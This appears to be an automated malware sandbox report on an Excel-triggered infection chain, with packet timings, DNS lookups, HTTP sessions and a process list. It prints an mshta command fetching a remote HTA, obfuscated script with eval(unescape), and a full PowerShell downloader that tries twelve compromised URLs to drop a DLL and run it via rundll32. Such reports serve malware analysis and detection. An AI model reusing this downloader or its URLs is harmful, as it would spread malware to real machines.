                                                                                                                                                          Jan 29, 2022 00:14:51.251230001 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251255989 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251276970 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251291037 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251298904 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251322031 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251342058 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251359940 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251362085 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251384974 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251405954 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251421928 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251426935 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251450062 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251472950 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251486063 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251494884 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251519918 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251542091 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251555920 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251564980 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251590014 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251611948 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251626968 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251635075 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251657963 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251681089 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251697063 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251703978 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251729012 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251749992 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251764059 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251773119 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251795053 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251817942 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251832008 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251840115 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251863956 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251869917 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251878977 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251888990 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251893044 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251913071 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251935959 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251950979 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251960039 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251960039 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251971960 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251985073 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251993895 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.252022982 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.430290937 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.430371046 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.430406094 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.430447102 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.430484056 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.430522919 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.430548906 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.430561066 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.430588007 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.430591106 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.430593014 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.430597067 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.430598974 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.430603981 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.430639982 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.430644989 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.430671930 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.430681944 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.430685043 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.430727005 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.430762053 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.430766106 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.430792093 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.430804968 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.430805922 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.430840015 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.430846930 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.430886030 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.611394882 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.611407995 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.611414909 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.611428022 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.611435890 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.611444950 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.611459017 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.611469030 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.611479044 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.611490965 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.611500025 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.611512899 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.611521959 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.611526966 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.611543894 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.611556053 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.611566067 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.611577034 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.611587048 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.611598015 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.611612082 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.021205902 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.021322966 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.199410915 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.199453115 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.199470043 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.199493885 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.377614021 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.377650976 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.377669096 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.377692938 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.377789021 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.377820015 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.381074905 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.381084919 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.555984974 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.556030035 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.556164980 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.557081938 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.558943987 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.558981895 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.559001923 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.559025049 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.559046984 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.559071064 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.559077978 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.559132099 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.559139013 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.559169054 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.559179068 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.559182882 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.734328985 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.734364986 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.734488010 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.735116005 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.735145092 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.735157013 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.735172033 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.735174894 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.735193968 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.735197067 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.735205889 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.735223055 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.735230923 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.735248089 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.735255957 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.735270023 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.735322952 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.735349894 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.737112999 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737143993 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737166882 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737188101 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737198114 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.737211943 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737222910 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.737235069 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737257957 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737265110 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.737281084 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737303019 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737309933 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.737324953 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737344980 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737355947 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:53.005868912 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:55.897238016 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:55.899502039 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:15:33.471713066 CET804916691.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:15:33.471811056 CET4916680192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:16:08.501727104 CET4916680192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:16:08.563065052 CET804916691.240.118.172192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 29, 2022 00:14:28.510279894 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 29, 2022 00:14:28.530721903 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Jan 29, 2022 00:14:49.789092064 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Jan 29, 2022 00:14:49.807781935 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 29, 2022 00:14:28.510279894 CET | 192.168.2.22 | 8.8.8.8 | 0x8553 | Standard query (0) | hostfeeling.com | A (IP address) | IN (0x0001)
Jan 29, 2022 00:14:49.789092064 CET | 192.168.2.22 | 8.8.8.8 | 0xaa33 | Standard query (0) | jurnalpjf.lan.go.id | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 29, 2022 00:14:28.530721903 CET | 8.8.8.8 | 192.168.2.22 | 0x8553 | No error (0) | hostfeeling.com |  | 164.90.147.135 | A (IP address) | IN (0x0001)
Jan 29, 2022 00:14:49.807781935 CET | 8.8.8.8 | 192.168.2.22 | 0xaa33 | No error (0) | jurnalpjf.lan.go.id |  | 103.206.244.105 | A (IP address) | IN (0x0001)

• 91.240.118.172
• jurnalpjf.lan.go.id

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 91.240.118.172 | 80 | C:\Windows\System32\mshta.exe

Timestamp | kBytes transferred | Direction | Data
Jan 29, 2022 00:14:24.156452894 CET | 0 | OUT | GET /gg/ff/fe.html HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.240.118.172
Connection: Keep-Alive
Jan 29, 2022 00:14:24.216399908 CET | 2 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Fri, 28 Jan 2022 23:14:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                                                          Data Ascii: -x{~Hx~x06x2>ThxGsw\nryZ x*x of this {Wzs w%w\'wxcxx\'by <b~gxJxCxExxwx} xFCCw~#~% Guardx]nyzxJ~g/w6w4brww ul~2maxw"ox+w`w,ow.t yw wE~&wexZiw]zssxZJa} }p{&twt wv}y|xw~
                                                                                                                                                          Jan 29, 2022 00:14:24.216530085 CET6INData Raw: 32 4b 63 49 38 48 57 51 50 41 38 5b 30 5d 2b 3d 27 32 7e 34 78 53 7f 6e 7e 34 7f 65 78 7a 78 2b 77 0f 77 3f 77 7a 62 77 42 78 32 7e 09 7f 72 7a 17 78 16 7e 70 7e 40 7f 2f 7e 42 7f 77 7f 2e 7f 70 77 2d 76 1a 76 47 7f 2e 78 2a 7f 6d 78 1b 78 5c 72
                                                                                                                                                          Data Ascii: 2KcI8HWQPA8[0]+='2~4xSn~4exzx+ww?wzbwBx2~rzx~p~@/~Bw.pw-vvG.x*mxx\r~Ixdx_x~.kx#wTw7vv0w;xIvxLxNxPxRxTxVxXxZx\\x^wkxaxcxexgsxixkxmfxoxq~0xtxvxxv?x|x~vCwC0wwwwww\rv@w>x/0x1x">vM.Pw-WwJv&vUwOvwQw6yzawQ~du#v-/x
                                                                                                                                                          Jan 29, 2022 00:14:24.216573954 CET7INData Raw: 28 71 38 7e 58 73 4b 78 66 78 6c 7e 5c 27 7f 3a 73 14 72 44 71 13 7b 69 71 15 7f 28 7f 37 7f 39 7f 2c 71 50 71 52 71 51 7b 21 71 52 73 36 71 56 71 59 71 58 71 5b 71 57 75 2d 77 55 7d 7a 62 7f 6b 7f 3b 71 46 78 47 7f 32 71 49 72 66 74 05 7f 65 72
                                                                                                                                                          Data Ascii: (q8~XsKxfxl~\':srDq{iq(79,qPqRqQ{!qRs6qVqYqXq[qWu-wU}zbk;qFxG2qIrfterrqMru38,47qoqq}hqo1s75,qQqQ{qwqwq^vGaqaqc 3qfqKqiqru0,qmpqnqtqQpqy,q|qt}hqq`qbtxG4pu0qLrtqp\rqpqrq}z-q}qzp2q}p;q_pu.zawZtpqhqjp!
                                                                                                                                                          Jan 29, 2022 00:14:24.216612101 CET9INData Raw: 25 32 39 25 32 43 25 36 43 25 33 30 25 33 44 6e 25 36 35 5c 31 36 37 25 32 30 5c 31 30 31 25 37 32 72 5c 31 34 31 25 37 39 25 32 38 25 32 39 25 32 43 49 25 36 43 25 33 44 25 33 31 25 33 32 25 33 38 25 33 42 64 5c 31 35 37 25 37 42 6c 25 33 30 25
                                                                                                                                                          Data Ascii: %29%2C%6C%30%3Dn%65\167%20\101%72r\141%79%28%29%2CI%6C%3D%31%32%38%3Bd\157%7Bl%30%5B%49l%5D%3D%53tr%69\156g%2EfromCh\141%72Co\144%65%28Il%29%7D\167%68%69%6Ce%28%2D%2DI%6C%29%3BIl%3D%31%32%38%3Bl%31%5B%30%5D%3D%6Ci%3Dl%30%5Bl%37%5B%30%5D%5D%3B%
                                                                                                                                                          Jan 29, 2022 00:14:24.216658115 CET10INData Raw: 34 7f 53 7f 69 78 0f 73 2a 70 43 6f 58 6d 18 7f 28 7f 78 7f 75 7f 75 6e 62 6d 62 6d 21 72 31 6f 29 73 4b 7f 72 7f 3d 6f 40 77 23 6e 52 7e 2e 78 03 74 4c 75 2d 7f 64 70 37 7f 20 7f 44 6e 6d 6c 10 75 67 6f 69 6f 1a 74 1b 74 24 6f 2a 6c 34 73 4b 7f
                                                                                                                                                          Data Ascii: 4Sixs*pCoXm(xuunbmbm!r1o)sKr=o@w#nR~.xtLu-dp7 Dnmlugoiott$o*l4sKo=s(}y(s,s.}Ks1s3(lroBfx,pzr*25+{?n]lxG{kks,ks>kd*ospB+\'tDosOou;k/k1=ol1klOkk2k.k4tVtOtQx7k5lp{y}w xtXvN}dExc|8Lw%vztw\'wz
                                                                                                                                                          Jan 29, 2022 00:14:24.216698885 CET11INData Raw: 7f 2e 7e 3e 7f 69 75 2c 67 4d 67 59 7f 28 7f 38 67 63 67 5f 67 73 78 18 7f 34 67 5d 67 2e 7f 22 78 61 7e 7d 69 41 6f 67 77 79 7f 61 74 18 7f 73 77 26 78 39 7f 43 6c 0b 7f 65 68 52 7f 6a 68 56 6f 6d 67 56 7f 29 69 41 7f 63 66 12 7f 76 67 58 67 61
                                                                                                                                                          Data Ascii: .~>iu,gMgY(8gcg_gsx4g]g."xa~}iAogwyatsw&x9ClehRjhVomgV)iAcfvgXga(gssEg]gwffg^g`s>5pBffff9f#ff\'ff)yx+gsf,f+f&f(f}iyxf1s>xs~f.frgzf7s}pf?gysgx0s~fB08fDf<fIf3s>}xf\nffs.R}wfgMgDbgFnxZffJi_gNx,x
                                                                                                                                                          Jan 29, 2022 00:14:24.216737986 CET12INData Raw: 20 20 28 62 31 37 64 37 51 4c 42 68 38 67 68 29 3b 62 33 52 5a 34 44 32 78 42 50 77 20 20 20 28 62 31 37 64 37 51 4c 42 68 38 67 68 29 3b 68 57 50 44 66 35 6c 74 53 37 4d 59 37 32 59 32 34 34 20 20 20 20 28 78 32 63 56 58 6c 33 39 29 3b 67 38 35
                                                                                                                                                          Data Ascii: (b17d7QLBh8gh);b3RZ4D2xBPw (b17d7QLBh8gh);hWPDf5ltS7MY72Y244 (x2cVXl39);g85tUx8O57Sri34='vE7JOE4YL7z2BEimBE630IL966M' ;eval(unescape('%71%79%36%28%22%63%37%39%38%66%62%36%39%66%22%29%3B'));cG3XHY59bDjh8i5+='syQqJrqlvQcnJERouTsFYMXOqfK
                                                                                                                                                          Jan 29, 2022 00:14:24.216768026 CET12INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 91.240.118.172 | 80 | C:\Windows\System32\mshta.exe
Timestamp | kBytes transferred | Direction | Data
Jan 29, 2022 00:14:28.408085108 CET | 13 | OUT | GET /gg/ff/fe.png HTTP/1.1
Host: 91.240.118.172
Connection: Keep-Alive
Jan 29, 2022 00:14:28.471710920 CET | 14 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Fri, 28 Jan 2022 23:14:28 GMT
Content-Type: image/png
Content-Length: 1199
Connection: keep-alive
Last-Modified: Fri, 28 Jan 2022 14:54:48 GMT
ETag: "4af-5d6a59dbe5e00"
Accept-Ranges: bytes
                                                                                                                                                          Data Ascii: $path = "C{seeda}:\Pr{seeda}ogramD{seeda}ata\{seeda}JooSee.d{seeda}ll".replace('{seeda}','');$url1 = 'http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/';$url2 = 'http://jurnalpjf.lan.go.id/assets/iM/';$url3 = 'http://it-o.biz/bitrix/xoDdDe/';$url4 = 'http://bimesarayenovin.ir/wp-admin/G1pYGL/';$url5 = 'http://gardeningfilm.com/wp-content/pcMVUYDQ3q/';$url6 = 'http://daisy.sukoburu-secure.com/8plks/v8lyZTe/';$url7 = 'https://property-eg.com/mlzkir/97v/';$url8 = 'http://totalplaytuxtla.com/sitio/DgktL3zd/';$url9 = 'http://maxtdeveloper.com/okw9yx/Gc28ZX/';$url10 = 'http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/';$url11 = 'http://activetraining.sytes.net/libraries/8s/';$url12 = 'https://gudangtasorichina.com/wp-content/GG01c/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } }
Jan 29, 2022 00:14:28.471724987 CET | 14 | IN
                                                                                                                                                          Data Ascii: catch{}} Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\JooSee.dll',ssAAqq;


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49168 | 103.206.244.105 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 29, 2022 00:14:49.986639977 CET | 15 | OUT | GET /assets/iM/ HTTP/1.1
Host: jurnalpjf.lan.go.id
Connection: Keep-Alive
Jan 29, 2022 00:14:50.175324917 CET | 17 | IN | HTTP/1.1 200 OK
Date: Fri, 28 Jan 2022 23:14:50 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.4.27
X-Powered-By: PHP/7.4.27
Set-Cookie: 61f478ea13105=1643411690; expires=Fri, 28-Jan-2022 23:15:50 GMT; Max-Age=60; path=/
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Fri, 28 Jan 2022 23:14:50 GMT
Expires: Fri, 28 Jan 2022 23:14:50 GMT
Content-Disposition: attachment; filename="S2TSbn.dll"
Content-Transfer-Encoding: binary
Content-Length: 548864
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload


                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:00:14:13
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                                          Imagebase:0x13fd90000
                                                                                                                                                          File size:28253536 bytes
                                                                                                                                                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Target ID:2
                                                                                                                                                          Start time:00:14:16
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                                                                                                                                                          Imagebase:0x4a6c0000
                                                                                                                                                          File size:345088 bytes
                                                                                                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Target ID:4
                                                                                                                                                          Start time:00:14:16
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\System32\mshta.exe
